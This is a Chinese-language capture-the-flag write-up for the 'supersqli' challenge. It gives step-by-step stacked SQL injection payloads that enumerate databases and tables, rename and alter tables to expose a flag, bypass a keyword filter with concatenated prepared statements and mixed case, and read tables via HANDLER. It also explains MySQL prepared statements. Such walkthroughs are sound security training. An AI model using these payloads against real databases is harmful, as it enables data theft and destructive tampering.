攻防世界(六)supersqli
攻防世界系列:supersqli
方法一:
用逗号包裹回显正常,说明存在注入
1';--+(注释符也可用 -- 或 # 发现均未被过滤!)
有order by 语句可知表由2个字段,使用联合查询 (想看看当前所在的数据库)。结果发现关键字select被过滤了
-1' union select 1,database();--+
想到堆叠注入,发现可以。查看所有库
-1';show databases;--+
查看所有表
-1';show tables;--+
查看表words里的字段
-1';show columns from words;--+
查看表 `1919810931114514`
-1';show columns from `1919810931114514`;--+
注意:以纯数字命名的表,操作时要加上反引号。
至此可知flag就在这个数字表中,如何取出它呢?
分析:supersqli中两个表
words表,两个字段 id 、data。其中id为整形int(10)、data为字符型varchar(100)。
数字表,只有一个字段。且已知存的为flag
可以确定默认查询的表为words,我们使用rename、alter把flag所在的数字表修改为默认查询的表。
具体做法:
words名改为word123 alter table words rename to words123;
把数字表名改为 words alter table `1919810931114514` rename to words;
现在的words表中没有id字段,我们把flag字段名改为id alter table words change flag id varchar(100);
最终构造语句:
1'; alter table words rename to words123;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);--+
构造:
1'or 1=1--+
方法二:
Mysql的预编译,绕过select的过滤
什么是预编译?
参考:https://www.cnblogs.com/micrari/p/7112781.html
通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:
- 词法和语义解析
- 优化sql语句,制定执行计划
- 执行并返回结果
我们把这种普通语句称作Immediate Statements。
但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。
如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。
所谓预编译语句就是将这类语句中的值用占位符替代,可以视为将sql语句模板化或者说参数化,一般称这类语句叫Prepared Statements或者Parameterized Statements
预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止sql注入。
当然就优化来说,很多时候最优的执行计划不是光靠知道sql语句的模板就能决定了,往往就是需要通过具体值来预估出成本代价。
例如:
编译
我们接下来通过 PREPARE stmt_name FROM preparable_stm
的语法来预编译一条sql语句
mysql> prepare ins from 'insert into t select ?,?';
Query OK, 0 rows affected (0.00 sec)
Statement prepared
执行
我们通过 EXECUTE stmt_name [USING @var_name [, @var_name] ...]
的语法来执行预编译语句
mysql> set @a=999,@b='hello';
Query OK, 0 rows affected (0.00 sec)
mysql> execute ins using @a,@b;
Query OK, 1 row affected (0.01 sec)
Records: 1 Duplicates: 0 Warnings: 0
mysql> select * from t;
+------+-------+
| a | b |
+------+-------+
| 999 | hello |
+------+-------+
1 row in set (0.00 sec)
可以看到,数据已经被成功插入表中。
具体做法:
编译
set @sql = concat('sele','ct * from `1919810931114514`;');
prepare stm from @sql;
执行
execute stm;--+
最终构造语句:
set @sql = concat('sele','ct * from `1919810931114514`;');prepare stm from @sql;execute stm;--+
strstr对关键字set 和prepare进行了过滤,但他不区分大小写,我们可以绕过
1';sEt @sql = concat('sele','ct * from `1919810931114514`;');prEpare smt from @sql;execute smt;--+
方法三:
rename和alter如果被禁了,还可以用这个
1';handler `1919810931114514` open;handler `1919810931114514` read first;handler `1919810931114514` close;--+
(用于在知道表的情况下,部分关键字被禁止的情况下,用handler直接读取表内容。)
________________________________________________________
Every good deed you do will someday come back to you.
Love you,love word !